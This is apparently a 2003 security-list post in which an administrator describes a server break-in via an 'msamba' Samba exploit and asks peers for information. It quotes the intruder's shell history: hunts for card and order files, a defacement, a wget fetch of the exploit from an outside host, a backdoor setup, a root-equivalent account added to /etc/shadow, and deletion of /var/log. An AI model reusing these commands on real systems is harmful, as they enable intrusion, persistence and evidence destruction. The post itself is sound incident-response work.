msamba

From: Steve Bromwich (incidentat_private)
Date: Mon Apr 21 2003 - 08:41:27 PDT

    Hi,

    Has anyone seen an msamba exploit? A client of mine was cracked last night
    using this. Whoever it was configured it to erase everything after a
    reboot (I got in in time to see a lot of rm -rf and killed the box). I've
    now reinstalled and restored the data, but I suspect the script kiddie is
    trying to get in again. He was nice enough to leave a .bash_history in
    /root:

    ps -aux
    find // | grep *db
    find // | grep *.db
    find // | grep index.html
    cd /var/www
    ls -al
    cd tracking
    ls -al
    cd files
    ls -al
    cd /usr/share/sgml/docbook/stylesheet/dsssl/modular/images
    ls -al
    exit
    cd /usr/share/doc
    ls -al
    cd /var/www
    ls -al
    find // | grep *.log
    cd tracking
    ls -al
    cd files
    ls -al
    find // | grep index.*
    find // | grep shop.mdb
    find // | grep *.mdb
    exit
    cd /var
    locate order.log
    locate order.txt
    locate mdb
    locate metacart
    locate card
    cd www
    echo "qe3 wuzz here uid=0">about_us.html
    ps -aux
    cd /etc/init.d
    ls -al
    ./apache reload
    ps -aux
    cd /usr/etc
    ls -al /
    df
    cd /opt
    ls -al
    wget cahcepu.net/dhegleng/msamba.tar.gz
    pstree -p
    chmod 555 /tmp
    chmod 555 /var/tmp
    chmod 555 /var/vbox
    /usr/sbin/lsof |grep LISTEN
    /sbin/fuser -n tcp 23
    dir
    tar xzvf 73.tgz
    cd " "
    dir
    ls
    cd ..
    dir
    cd evil
    ./setup muie 55055 angelboy@the-darkside.info
    passwd daemon
    passwd daemon
    echo uid:x:0:0::/:/bin/bash >> /etc/shadow
    passwd $uid
    locate .log
    rm -rf /var/log/
    chmod 555 /tmp
    chmod 555 /var/tmp
    pstree -p

    I picked up the copy of msamba and had a look at it; it looks like it's
    exploiting the recent samba bug for a wide variety of platforms (*BSD,
    SuSE, Slackware, Redhat, Mandrake, Gentoo and Debian). There's a tag in
    there that says "*** JE MOUET JE MUIL HOUWE - qe3" which I think might be
    Dutch (and I think, based on scans I'm seeing, the guy might be coming in
    from an IP registered to cyberangels.nl, but I don't have any hard proof).

    Mail is being sent to slamet_irdakat_private once the exploit gets in,
    with output from uname -a and id being sent. The datestamp on the files
    are 18 April 08:43, which makes me think this might be close on a zero day
    exploit. I can't find anything about msamba googling around, either. The
    only other hint I had was the client mentioned there was "a lot of stuff
    about gzip running out of memory on the screen".

    Unfortunately I don't have the data from the drive to do any forensics on;
    as /var/log had been deleted it wasn't felt justified to go in deeper, and
    I just reformatted and reinstalled.

    Anyone else seen this? I'd like to make sure I've got everything tied down
    enough that this won't happen again. Samba wasn't supposed to be on there,
    and it's now been removed. I have a suspicion ssl might have been involved
    too, due to the gzip comment and the way apache was reloaded.

    Cheers, Steve

    Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
    world's premier event for IT and network security experts.  The two-day
    Training features 6 hand-on courses on May 12-13 taught by professionals.
    The two-day Briefings on May 14-15 features 24 top speakers with no vendor
    sales pitches.  Deadline for the best rates is April 25.  Register today to
    ensure your place. http://www.securityfocus.com/BlackHat-incidents